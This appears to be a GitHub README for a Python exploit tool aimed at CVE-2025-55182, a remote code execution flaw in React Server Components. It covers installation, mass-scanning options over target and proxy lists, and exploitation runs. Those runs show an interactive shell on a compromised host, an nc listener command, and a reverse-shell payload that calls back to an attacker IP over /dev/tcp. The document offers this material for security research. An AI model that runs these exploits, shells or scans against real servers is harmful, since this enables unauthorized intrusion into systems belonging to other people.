Warning
This repository is intended for educational and research purposes only.
- Use the provided PoCs exclusively on systems you own or have explicit permission to test.
- Unauthorized access, exploitation, or misuse of any material in this repository is illegal.
- The author(s) assume no responsibility for any damages, misuse, or legal consequences resulting from improper use.
CVE-2025-55182 is a critical remote code execution vulnerability affecting React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0. This vulnerability stems from unsafe deserialization of HTTP request payloads to Server Function endpoints, allowing unauthenticated attackers to execute arbitrary code remotely.
CVE ID: CVE-2025-55182
Affected Versions:
- react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
- react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
- react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0
- Python 3.8 or higher
- pip (Python package manager)
- Clone the repository
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182- Create a virtual environment (recommended)
python3 -m venv .venv
source .venv/bin/activate- Install dependencies
pip install -r requirements.txtpython3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]
| Argument | Description |
|---|---|
-d, --detection |
Run in detection mode (scan for vulnerabilities) |
-e, --exploit |
Run in exploitation mode (exploit a single target) |
-u, --url URL |
Single target URL to scan/exploit |
-l, --list FILE |
File containing list of target URLs (detection mode only) |
-p, --proxy URL |
Single proxy URL (e.g., http://127.0.0.1:8080) |
-pl, --proxy-list FILE |
File containing list of proxy URLs (one per line) |
-t, --threads N |
Number of concurrent threads (default: 10, detection mode only) |
-s, --silent |
Silent mode - only show vulnerable targets (detection mode only) |
-o, --output [FILE] |
Save vulnerable targets to file (detection mode only). If no filename provided, uses default: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt |
--debug |
Enable debug logging - shows response details and retry attempts (not available in silent mode) |
python3 main.py -d -u https://example.compython3 main.py -d -l targets.txtpython3 main.py -d -l targets.txt -p http://127.0.0.1:8080python3 main.py -d -l targets.txt -spython3 main.py -d -l targets.txt -t 20python3 main.py -e -u https://vulnerable-site.comThen select [i] for interactive shell:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): i
shell> whoami
ec2-user
shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)
shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ..
...
shell> exit
python3 main.py -e -u https://vulnerable-site.comThen select [r] for reverse shell and choose payload type:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): r
Choose payload option:
[d] Use default payloads (Try multiple reverse shells)
[c] Provide custom payload
Enter your choice (d/c): d
Enter your IP and port in this format:
Example: 192.168.1.100:4444
IP:PORT> 192.168.1.100:4444
Setup your listener with this command:
nc -lvnp 4444
Press ENTER when your listener is ready...
The tool will automatically try 17+ different reverse shell payloads until one succeeds.
Enter your choice (d/c): c
Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
- Official React Security Advisory
- Meta Security Advisory
- Vercel Security Advisory
- Next.js Security Advisory
- CVE Details
If you find this tool useful, please consider giving it a star! ⭐
Made with ❤️ for the security community
Made with ❤️ for the security community